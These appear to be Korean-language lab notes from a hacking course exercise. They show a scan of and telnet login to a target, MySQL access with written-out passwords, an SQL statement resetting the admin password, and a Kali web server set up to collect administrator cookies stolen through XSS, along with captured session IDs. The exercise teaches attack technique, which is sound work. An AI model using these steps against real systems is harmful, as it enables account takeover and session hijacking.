공격은 칼리를 이용(NAT)
Attack.py를 이용하여 또는 완성하여
192.168.0.127를 공격하라
배포된 암호와 배포된 계정으로 사용자를 찾아라
네트워크 (dhcp)
칼리 root로
ping 192.168.0.127
namp -c -sT -O 192.168.0.127
칼리로
telnet 192.168.0.127
board
passwd:p2puDN00
mysql 접속
cd /usr/local/apache
cd /usr/share
cd /usr/local
cd mysql
cd bin
./mysql -u root -p shop
mysql비번 : fnxm
update paran_board_member set password=password('123456') where user_id='admin'
select user_id,password,name,level from paran_board_member;
미션5
web2.st.kr에서도 확인가능함
해커의 XSS공격을 통해 관리자 쿠키 확인
포트22,80열어주고 root로 systemctl start apache2 -> systemctl start ssh(ssh 작동)
Xshell에서 칼리로 접속 cd /etc/apache2 -> ls -> cd sites-available -> ls -> nano 000-default.conf
-> /var/www/html(www/html은 root이다)에서 /home/kali/public_html로 변경 ->cd public_html -> cd /home/kali
-> ls -> cd public_html -> ls -> sudo systemctl restart apache2 -> chmod 711 $HOME -> chmod 755 ~/public_html
-> ls -> touch index.html -> root접속 -> a2enmod userdir -> systemctl restart apache2 -> exit -> ls
-> nano cookie.php -> ls -> cat cookie.php -> 웹사이트에서 확인 192.168.0.210/cookie.php -> touch cookie.txt -> sudo apt -y install php
-> sudo systemctl restart apache2 -> ls -al -> sudo apt -y install php8.2-fpm(php8.3 설치X php8.2 대신설치함) -> root로 a2enmod proxy_fcgi setenvif -> a2enmod php8.2-fpm
-> systemctl restart apache2 -> cd /home/kali -> cd /public_html -> systemctl restart php8.2-fpm apache2 -> chmod 777 cookie.txt
->창 하나더띄워서 cd "/home/kali/public_html" -> ls -> cat cookie.txt -> 웹사이트 192.168.0.127에 글작성
burp suite에 -> PessionID : 93a24d4e512c1c09c7eea5c209522245
PHPSESSID : bb6c1a4b0b89da505eefbc6d81a65954
CREATE TABLE cookie (
idx int(6),
url varchar(100),
cookie varchar(100),
reg_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
PRIMARY KEY (idx)